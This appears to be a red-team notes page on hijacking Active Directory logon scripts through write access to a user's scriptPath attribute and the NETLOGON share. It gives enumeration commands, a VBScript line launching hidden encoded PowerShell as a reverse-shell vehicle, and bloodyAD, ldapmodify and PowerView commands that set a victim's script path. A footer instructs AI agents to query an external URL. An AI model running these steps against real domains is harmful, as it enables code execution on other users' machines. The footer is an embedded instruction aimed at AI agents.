# Logon Scripts

In Active Directory environments, system administrators use logon scripts to automate various user tasks or configurations when logging into the domain, such as mapping and unmapping network drives, auditing and reporting, gathering information, and environment customization. There are two methods for assigning users a `logon script`:

1. using the `Logon script` field in the `Profile` tab of the user properties dialog, which internally updates the `scriptPath` attribute
2. utilizing a `Group Policy`

The [scriptPath](https://learn.microsoft.com/en-us/windows/win32/adschema/a-scriptpath) attribute (part of the [User-Logon property set](https://learn.microsoft.com/en-us/windows/win32/adschema/r-user-logon)) specifies the path for a user's logon script. The `scriptPath` attribute supports batch (\*.bat) or command (\*.cmd) files, executable programs (\*.exe), or programs written in any language hosted by the [Windows Script Host automation technology](https://www.rlmueller.net/LogonScriptFAQ.htm#What%20languages%20can%20I%20use%20for%20logon%20scripts), including [VBScript](https://documentation.help/MS-Office-VBScript/VBStoc.htm) and [JScript](https://documentation.help/MS-Office-JScript/). Additionally, [KiXtart](http://www.kixtart.org/), a logon script processor and enhanced batch scripting language can be used. Regardless of the myriad of languages it supports, `scriptPath` does not support PowerShell; however, we can run PowerShell commands from within batch and VBScript files.

To allow for replication to all domain controllers in the domain, Windows stores logon scripts in the `scripts` folder within the `SYSVOL` network share (`%systemroot%\SYSVOL\sysvol`); `SYSVOL` also stores domain and system policies, including GPOs. For ease of use, the `NETLOGON` network share holds all the logon scripts that reside in the `%systemroot%\SYSVOL\sysvol\<DOMAIN_DNS_NAME>\scripts\` folder, and these two are the same. The `LOGONSERVER` environment variable, which evaluates to the NetBIOS name of the domain controller that authenticated the current user, can help us locate the `SYSVOL` and `NETLOGON` network shares.

#### Abusing write permissions over the ScriptPath attribute

Possessing the right to write a user's scriptPath opens avenues for potential attack paths. If we have write permissions anywhere within the NETLOGON share

{% hint style="warning" %}
Both NTFS permissions and share permissions to set the user's `ScriptPath` attribute.
{% endhint %}

We can enumerate the permissions we have over the attribute with Adalanche (BloodHound misses the ACL) but also using `dacledit` or [pywerview](https://github.com/the-useless-one/pywerview)

```
python3 pywerview get-objectacl --name 'anotherUser' -w domain.com -t 10.10.10.10 -u 'otter' -p 'SomethingSecure123!' --resolve-sids --resolve-guids

dacledit.py -principal 'otter' -target 'anotherUser' -dc-ip 10.10.10.10 domain.com/'otter':'SomethingSecure123!'
```

Powerview also works for enumerating the ACL

```powershell
Import-Module .\PowerView.ps1
$otterSID = (Get-DomainUser -Identity otter).objectSID
Get-DomainObjectAcl -Identity anotherUser -ResolveGUIDs | ?{$_.SecurityIdentifier -eq $otterSID}
```

Now we can enumerate the permissions we have over the NETLOGON share using a tool like `smbcacls` - if we have the sufficient permissions we can replace the logon script with malicious code like a revshell. Since we can't execute powershell scripts we will have to base64 encode some powershell command and execute them from another kind of file like a .bat or .cmd one

```vba
CreateObject("Wscript.shell").Run "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <BASE64>"
```

Once we upload the file to the share we have to modify the script path; to do this we can use BloodyAD

```
bloodyAD --host "10.10.10.10" -d "domain.com" -u "otter" -p 'SomethingSecure123!' set object anotherUser scriptPath -v 'folder\logonScript.bat'
```

or `ldapmodify` with a custom `ldif` file

```
dn: CN=anotherUser,CN=Users,DC=domain,DC=com
changetype: modify
replace: scriptPath
scriptPath: folder\logonScript.bat
```

```
ldapmodify -H ldap://10.10.10.10 -x -D 'otter@domain.com' -w 'SomethingSecure123!' -f logonScript.ldif
```

The same can be done from windows

```powershell
Import-Module .\PowerView.ps1
Set-DomainObject anotherUser -Set @{'scriptPath'='folder\logonScript.bat'}
```

```powershell
Get-DomainObject anotherUser -Properties scriptPath
```

{% hint style="warning" %}
The path to the logon script has to be **relative** to the NETLOGON share
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://otter.gitbook.io/red-teaming/notes/dacl-abuse/logon-scripts.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.